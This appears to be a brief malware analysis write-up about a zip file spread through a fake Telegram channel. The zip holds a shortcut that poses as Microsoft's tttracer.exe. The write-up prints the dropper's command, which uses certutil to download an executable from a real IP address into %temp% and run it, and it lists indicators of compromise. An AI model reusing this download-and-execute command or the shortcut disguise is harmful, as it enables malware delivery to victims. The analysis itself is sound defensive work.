# Malware Real case ![image](https://hackmd.io/_uploads/SJtD5lcLbx.png) i see someone sends zip file. ![image](https://hackmd.io/_uploads/HkSt5xcUWl.png) it seems like real channel but i noticed channel subscribers only 32 people ![image](https://hackmd.io/_uploads/rJh1jx9Lbx.png) Moreover i see telegram channel url attacker hasn't changed like original they puts like chinese character ![image](https://hackmd.io/_uploads/B13SjlcUZg.png) i unzip it ![image](https://hackmd.io/_uploads/SyWVsg98Zx.png) The .lnk pretends to be legit From file mals.lnk: ```bash! LocalBasePath "C:\Windows\System32\tttracer.exe" RunAsUser window=showminnoactive ``` This is intentional deception tttracer.exe is a real Microsoft binary The shortcut points to it so users trust it Window minimized → user doesn’t notice anything it is dropper malware and hide it in %temp% ![image](https://hackmd.io/_uploads/BknCigcLZx.png) ```bash! cmd /C certutil.exe -urlcache -f http://202.95.11.173/1.exe %temp%/1.exe && start %temp%/1.exe ``` ![image](https://hackmd.io/_uploads/SyNH3lcUWx.png) ![image](https://hackmd.io/_uploads/ryccTxqIbx.png) Suspicious activity ![image](https://hackmd.io/_uploads/HyWvRe58Ze.png) Graph ![image](https://hackmd.io/_uploads/HJ2Y0gc8-x.png) ![image](https://hackmd.io/_uploads/BJwYJ-c8bl.png) ![image](https://hackmd.io/_uploads/BkpFlWc8Zl.png) ### IOC ![image](https://hackmd.io/_uploads/ryjXCxc8Wx.png) ## https://www.virustotal.com/gui/ip-address/202.95.11.173 ## https://app.any.run/tasks/6125695d-8a5b-40e4-a1a3-e28503006768